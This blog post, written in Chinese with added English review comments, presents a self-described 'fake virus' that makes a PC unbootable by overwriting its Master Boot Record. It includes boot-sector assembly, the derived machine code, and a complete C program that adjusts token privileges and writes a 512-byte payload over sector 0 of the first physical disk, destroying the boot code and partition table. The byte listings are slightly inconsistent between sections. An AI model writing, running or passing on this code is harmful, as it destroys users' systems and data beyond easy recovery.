mbr引导区


功能

一个简单的病毒(不能传播的假病毒),通过改写mbr,达到不能开机的效果😬

mbr

MBR是硬盘的主引导记录,即硬盘的0柱面、0磁头、1扇区,也称为主引导扇区。MBR占用512个字节(200h),它在硬盘启动时负责把系统控制权交给用户指定的操作系统引导程序,因此它先于操作系统拿到控制权。

病毒原理

1.准备要写入的mbr。
2.提升程序权限,调用CreateFile函数去打开物理驱动器的时候,必须具备调试权限,否则就会打开失败,打开失败我们就不能对mbr进行读取了。
3.写入mbr,这样就能先于操作系统拿到控制权了。

汇编源码

;-----------------------------------------------------------------------
; Boot-sector payload (16-bit real mode, MASM-style syntax)
; Runs in place of the normal MBR boot code.  The offset 7C18h below
; assumes the BIOS loads the sector at its conventional address 7C00h
; and that the message string starts 18h (24) bytes in, directly after
; the machine code listed further down the page.
; Effect: prints a message through BIOS INT 10h and then spins forever,
; so control is never handed to an operating system (denial of boot).
;-----------------------------------------------------------------------
assume cs:code 
code segment
start:
mov ax,12h           ;AH = 00h (set video mode), AL = 12h: 640x480 16-colour VGA graphics mode
int 10h              ;BIOS video service
mov bp, 7C18H        ;BP = offset of the message string (sector base 7C00h + 18h bytes of code)
mov cx, 13h          ;CX = string length (19 bytes)
mov ax,1301h         ;AH = 13h (write string), AL = 01h: attribute in BL, cursor advanced after output
mov bx,0Ch           ;BH = 00h (display page 0), BL = 0Ch (attribute: light red on black)
mov dx,0h            ;DH = row 0, DL = column 0 (where the string starts)
int 10h
jmp $       ;infinite loop: halt here so execution never runs into the data bytes that follow
code ends
end start

获得机器码

B8 12 00 CD 10 BD 18 7C B9 13 00 B8 01 13 BB 0C 00 BA 00 00 CD 10 EB FE
之后将想要显示的字符串添加到后面
68 61 63 6B 20 62 79 20 54 68 72 69 75 6D 70 68
21 14
最后两个字节必须是55AA,因为55AA是MBR的结束标志

编写mbr引导区病毒

主程序有两个函数,一个函数提权,一个函数写mbr

#include<windows.h>
#include<winioctl.h>
/* 512-byte sector image that ReadPHYSICALDRIVE0() below writes over
 * sector 0 (the MBR) of the first physical disk.  Layout, per the
 * listing above: machine code for the INT 10h message routine, the ASCII
 * message, zero padding, and the 0x55 0xAA boot signature that the BIOS
 * requires at offsets 510-511.  NOTE(review): the initializer must hold
 * exactly 512 entries for the signature to land at 510-511 -- the count
 * is not verified here.  Writing this over sector 0 replaces the existing
 * boot code AND the legacy partition table that lives in the same sector
 * with zeros; without a backup of sector 0 there is no undo. */
char temp[512]= {
0xB8,0x12,0x00,0xCD,0x10,0xBD,0x18,0x7C,0xB9,0x13,00,0xB8,0x01,0x13,0xBB,0x0C,00,0xBA,00,00,
0xCD,0x10,0xE2,0xFE,0x68,0x61,0x63,0x6B,0x65,0x64,0x20,0x62,0x79,0x20,0x54,0x68,0x72,0x69,0x75,
0x6D,0x70,0x68,0x20,0x20,0x20,0x20,0x20,0x20,0x00,0x00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,0x55,0xAA
};

//自己写一个函数来提权。
//Enable SeDebugPrivilege on the current process token.
//Every Win32 call below is made without checking its return value, so a
//failure (for example when the process is not running elevated) is silent
//and the caller cannot tell whether the privilege was actually granted.
//If OpenProcessToken() fails, hTokenHandle is uninitialized and is later
//passed to AdjustTokenPrivileges() and CloseHandle() anyway.
//NOTE(review): SeDebugPrivilege is not what gates raw access to
//\\.\PHYSICALDRIVE0; that open is governed by the device's ACL (normally
//administrators only) -- confirm, but do not expect this function alone to
//make the open succeed.
void GetPrivileges()
{
//Process handle, token handle, and a descriptor for a single privilege
HANDLE hProcess;
HANDLE hTokenHandle;
TOKEN_PRIVILEGES tp;
//GetCurrentProcess() returns a pseudo-handle; CloseHandle() on it is a no-op
hProcess = GetCurrentProcess();
OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hTokenHandle);
//Resolve SE_DEBUG_NAME to its LUID and mark it as to-be-enabled
tp.PrivilegeCount =1; 
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid); 
tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
//AdjustTokenPrivileges() can return TRUE yet leave the privilege unassigned
//(GetLastError() == ERROR_NOT_ALL_ASSIGNED); that case is not checked here
AdjustTokenPrivileges(hTokenHandle,FALSE,&tp,sizeof(tp),NULL,NULL); 
CloseHandle(hTokenHandle);
CloseHandle(hProcess);
}
//下面的函数来读取"\\\\.\\PHYSICALDRIVE0"
//Despite its name this function WRITES: it opens the first physical disk as
//a raw device and overwrites its first 512 bytes (sector 0, the MBR) with
//temp[].  This is destructive and not reversible without a backup of
//sector 0; the existing boot code and partition table are replaced.
//Defects visible here: when CreateFile() fails the code only shows a
//message box and then still calls WriteFile() on INVALID_HANDLE_VALUE; the
//handle is never closed; the WriteFile() result and byte count are ignored.
//Defensive notes: a user-mode process opening \\.\PHYSICALDRIVEn with
//GENERIC_WRITE is a high-signal event for EDR / raw-disk-access monitoring,
//and the open normally requires an elevated (administrator) token.
//NOTE(review): on UEFI/GPT-booted systems the firmware does not execute MBR
//boot code, so the visible effect may differ; sector 0 is overwritten either
//way -- confirm on the target configuration.
void ReadPHYSICALDRIVE0()
{
HANDLE hFile;
DWORD dwReadSize;                //actually receives the number of bytes written
// char lpBuffer[512];
//Open the raw disk device: read+write, no sharing, must already exist
char str_Name[] = "\\\\.\\PHYSICALDRIVE0";
hFile = CreateFile(str_Name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING , FILE_ATTRIBUTE_NORMAL ,0);
if (hFile == INVALID_HANDLE_VALUE)
{
//Failure is reported but not acted on: execution falls through to WriteFile()
MessageBox(0, "wrong", "wrong", 0);
}
//Write one 512-byte sector at the fresh handle's file position 0 (the MBR);
//the handle is leaked afterwards
WriteFile(hFile, temp, 512, &dwReadSize, NULL);
}
//Entry point: attempt the privilege adjustment, then overwrite the MBR.
//Neither helper reports success or failure, so the process always exits 0.
int main()
{
GetPrivileges();
ReadPHYSICALDRIVE0();
return 0;
}

文章作者: 大茗茗のblog
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 大茗茗のblog !